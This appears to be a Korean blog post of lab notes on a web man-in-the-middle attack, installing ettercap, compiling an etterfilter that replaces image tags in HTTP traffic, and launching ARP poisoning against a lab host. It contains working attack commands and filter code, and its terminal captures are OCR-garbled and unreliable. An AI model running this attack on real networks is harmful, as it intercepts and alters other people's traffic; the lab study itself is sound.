2020. 7. 16.

[Network] S08 web_mitm


*Web 정보 변조

MITM 공격
  • 두 개체 간 통신에 끼어서 데이터 끼워넣기/빼기/복호화 등 데이터 흐름에 영향을 미치는 공격
  • ARP 리다이렉트, ICMP 리다이렉트, ARP 스푸핑 모두 엄밀히 말하면 MITM 공격이지만 일반적으로 MITM 공격을 말할 때는 이 세 가지 공격을 언급하지는 않음
  • ARP 리다이렉트, ICMP 리다이렉트, ARP 스푸핑 공격은 우선 전달되는 패킷의 MAC이나 IP 주소는 바꾸나 패킷 내용을 바꾸지는 않지만 MITM은 패킷 내용을 바꾸는 것도 시도

0 丨 E 1 . 1 . 11 · 7 El 0 | 日 丨 甼 Web Rt±l 192. 1 . 1 1 17 ♀ 丨 丕 R 1 . 1 . 11 · 47 at tacker

*Web 정보 변조 실습

공격에 쓰일 웹서버가 작동하는지 확인한다.
URL은 그림 파일을 직접 지정한다.

Ù sbl.png (239x369) C 192.168.11.17/sb1.D:ng

*Ettercap 설치

이더필터(etterfilter)를 이용 Web 정보를 중간에 변조해보자
Etterfilter를 포함한 ettercap패키지를 설치한다.

r00t@attacker_— [root@attacker yum install —Y ettercap Loaded p lug ins: fastestm irror Loading mirror speeds from cached hostfi le epel: mirrors .kernel .org * rpmforge: ftp.neowiz.com Setting up Install Process Resolving Dependenc ies Runn ing transact ion check Package ettercap. i38G . 3—22 . e15 set to be updated Process ing Dependency: ettercap—common = 0.7.3—22.e15 for package: > Runn ing transact ion check Package ettercap—common. i386 set to be updated F in i shed Dependency Resolut ion Dependencies Resolved ettercap

epel에서 제공하며 CentOS5 까지 0.7.3 버전이 제공된다. CentOS6 이후는 0.7.5(IPv6)버전이 제공된다.

CentOS5의 레파지토리 주소가 바뀌었다.
  • /etc/yum.repos.d/CentOS-Base.repo 파일 수정
  • 기존에 mirrorlist baseurl을 모두 #으로 마킹한다.
  • 각 항목에 아래와 같은 새 baseurl을 추가한다.
[base] [updates] [extras] [centosplus] [contrib]

*필터 파일 생성

필터 파일 생성 : filter.txt
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://192.168.11.17/sb1.png\"");
replace("IMG SRC=", "img src=\"http://192.168.11.17/sb1.png\"");
msg("Replaced the pic. \n");
}

필터 파일 컴파일
# etterfilter -o filter.ef filter.txt

Filter file을 생성하고 컴파일한다.
r00t@attacker_— [rooteattacker vi fi Iter .txt [rooteattacker cat f i Iter . txt if (ip.proto = 80) { TCP tcp.src = replace(" img src=" "http://192.168. 11 . 17/sb1 .pngW"") , "img src=W http://192.168.11 . 17/sb1 .pngW"") , SRC=". •mg src=W" the pic. *n"); [root@attacker etterfi Iter —o filter.ef filter.txt etterfi Iter NG—O.7.3 copyr ight 2001—2004 Al-OR & NaGA 12 protocol tables loaded: DECODED DÅTÅ tcp gre icmp ip arp wifi fddi tr eth I I constants loaded: VRRP OSPF GRE TCP ICMP6 ICMP PPTP PPP0E IP ARP Parsing source f i I e done. Unfolding the meta—tree done. Convert ing labels to real offsets done. Writing output to 'filter.ef' done. Script encoded into 8 instructions . [root@attacker

*MITM 공격

ettercap 을 이용 공격을 시작한다.
  • ettercap ARP 스푸핑과 fragreouter 기능을 동시에 수행한다.

ettercap -T -q -F filter.ef -M ARP /192.168.11.7/ //
  • 0.7.5 버전은 IPv6를 위한 버전이 IP뒤에 //를 붙인다.

ettercap 을 이용 공격을 시작한다.

r00t@attacker_— [root@attacker ettercap ettercap NG—O.7.3 copyr ight Content fi I ters loaded from -T -q -F filter.ef -M ARP /192.168.11.7/ // 2001-2004 ÅL0R & NaGA fi Iter .ef... (Ethernet) Listening on eth(). etho OO: OC: 15 192.168.11 .47 SSL dissection needs a valid script Pr ivi leges dropped to LJID 65534 GID 65534. 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor f ingerpr int 1698 tcp OS fingerprint 2183 known services Randomiz ing 255 hosts for scanning... Scann ing the whole netmask for 255 hosts.. 3 hosts added to the hosts I ist. ARP poisoning victims: GROUP 2 : ANY (all the hosts in the list) 255 .255 .255.0 in the etter .conf file 100.00 x

*Web 정보 변조 실습
대부분의 사이트는 공격이 되지 않는다.


시간:
라벨: ,

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)